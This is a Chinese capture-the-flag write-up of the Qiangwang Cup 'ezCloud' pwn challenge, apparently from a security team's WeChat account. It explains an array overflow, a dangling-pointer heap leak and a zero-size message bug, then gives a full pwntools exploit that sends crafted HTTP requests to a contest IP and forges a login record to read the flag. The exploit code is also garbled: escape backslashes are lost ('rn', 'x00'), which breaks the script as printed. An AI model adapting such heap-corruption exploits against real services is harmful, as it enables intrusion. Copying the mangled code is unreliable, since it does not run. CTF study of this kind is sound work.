强网杯 ezCloud题解


在比赛中代表星盟安全团队参赛的北极星队拿到了这道pwn题的一血

强网杯 ezCloud题解

EzCloud

notepad功能中存在一个数组溢出,可以将第17个位置的指针覆盖掉

强网杯 ezCloud题解

即可以覆盖LoginMsg指针,进而通过控制好堆布局,能够伪造一个登录信息

强网杯 ezCloud题解

通过伪造LoginMsg的isLogined为1,即可解锁功能,通过/flag功能获得flag

同时,getMsg有可能不会初始化结构体(当a1->msgs2.buf为NULL时),进而可以通过悬空指针泄露堆里面的地址

强网杯 ezCloud题解

在parse解析的时候没有判断v9是否为0,因此可以得到size为0的Msg

强网杯 ezCloud题解

EXP

#coding:utf8
from pwn import *
#sh = process('./EzCloud')
# pwntools tube to the contest service; the local-process variant is kept commented out above.
sh = remote('47.94.234.66',37128)
def login(user):
    """Send `POST /login` with *user* as Login-ID and wait for the 'Success!' banner."""
    request = ''.join([
        'POST /loginrn',
        'Login-ID: {}rn'.format(user),
        'rnrn',
    ])
    sh.send(request)
    sh.recvuntil('Success!')
def logout(user):
    """Send `POST /logout` for *user* and wait for the 'Success!' banner."""
    request = ''.join([
        'POST /logoutrn',
        'Login-ID: {}rn'.format(user),
        'rnrn',
    ])
    sh.send(request)
    sh.recvuntil('Success!')
def create_vm(name):
    """Send `POST /createvm` with *name* as Login-ID; no response is consumed here."""
    request = ''.join([
        'POST /createvmrn',
        'Login-ID: {}rn'.format(name),
        'rnrn',
    ])
    sh.send(request)
def add_size0(user):
    """Create a note with Content-Length 0 (multipart content type) and wait for the ack."""
    request = ''.join([
        'POST /notepadrn',
        'Login-ID: {}rn'.format(user),
        'Note-Operation: new%20notern',
        'Content-Length: {}rn'.format(0),
        'Content-Type: multipart/form-datarn',
        'rn',
    ])
    sh.send(request)
    sh.recvuntil('Notepad operation done')
def add(user,content):
    """Create a note for *user* whose body is *content*, then wait for the ack."""
    header = ''.join([
        'POST /notepadrn',
        'Login-ID: {}rn'.format(user),
        'Note-Operation: new%20notern',
        'Content-Length: {}rn'.format(len(content)),
        'Content-Type: application/x-www-form-urlencodedrn',
        'rn',
    ])
    body = content + 'rn'
    sh.send(header + body)
    sh.recvuntil('Notepad operation done')
def delete(user,index):
    """Delete note number *index* belonging to *user* and wait for the ack."""
    request = ''.join([
        'POST /notepadrn',
        'Login-ID: {}rn'.format(user),
        'Note-Operation: delete%20notern',
        'Note-ID: {}rn'.format(index),
        'rn',
    ])
    sh.send(request)
    sh.recvuntil('Notepad operation done')
def edit(user,index,content):
    """Replace the body of note *index* (owned by *user*) with *content*; wait for the ack."""
    header = ''.join([
        'POST /notepadrn',
        'Login-ID: {}rn'.format(user),
        'Note-Operation: edit%20notern',
        'Note-ID: {}rn'.format(index),
        'Content-Length: {}rn'.format(len(content)),
        'Content-Type: application/x-www-form-urlencodedrn',
        'rn',
    ])
    body = content + 'rn'
    sh.send(header + body)
    sh.recvuntil('Notepad operation done')
def show(user):
    """Send `GET /notepad` for *user*; the caller reads the response itself."""
    request = 'GET /notepadrnLogin-ID: {}rnrn'.format(user)
    sh.send(request)
def get_flag(user):
    """Send `GET /flag` with *user* as the Login-ID; the caller reads the response itself."""
    request = 'GET /flagrnLogin-ID: {}rnrn'.format(user)
    sh.send(request)
# Exploit sequence; runs at import time against the `sh` tube opened above.
login('a')
add('a','a'*0x10)
delete('a',0)
#raw_input()
add('a','a'*0x10)
# 'b'*0x10 is the marker the leak below searches for in the /notepad listing.
add('a','b'*0x10)
# Zero-length notes: the writeup says parse() never rejects a size of 0.
for i in range(5):
   add_size0('a')
add('a','a'*0x18)
show('a')
# Heap-address leak (the writeup attributes it to a dangling pointer in getMsg):
# skip past the marker and the next '<p>' tag, then read 6 address bytes.
sh.recvuntil('b'*0x10)
sh.recvuntil('<p>')
# NOTE(review): as written the fill argument 'x00' is three characters, so str.ljust() would raise
# TypeError; the backslash of the escape looks lost in extraction.
heap_addr = u64(sh.recv(6).ljust(8,'x00'))
print 'heap_addr=',hex(heap_addr)
for i in range(8):
   add('a','c'*0x10)
# Array overflow: this note overwrites the next pointer (the 17th slot, per the writeup).
add('a','d'*0x10)
logout('a')
raw_input()
# Fake LoginMsg at a fixed offset from the leaked heap address; the writeup states that
# isLogined == 1 in the forged record is what unlocks /flag.
fakeLoginMsg_addr = heap_addr + 0x2e80
payload = 'hrnrn'
payload += 'h'*0x6
payload += p64(1) + p64(fakeLoginMsg_addr + 0x20) + p64(0x1) + p64(0x1)
payload = payload.ljust(0x6b,'h')
payload += p64(fakeLoginMsg_addr)
payload = payload.ljust(0x120,'h')
get_flag(payload)

sh.interactive()


本文始发于微信公众号(星盟安全):强网杯 ezCloud题解
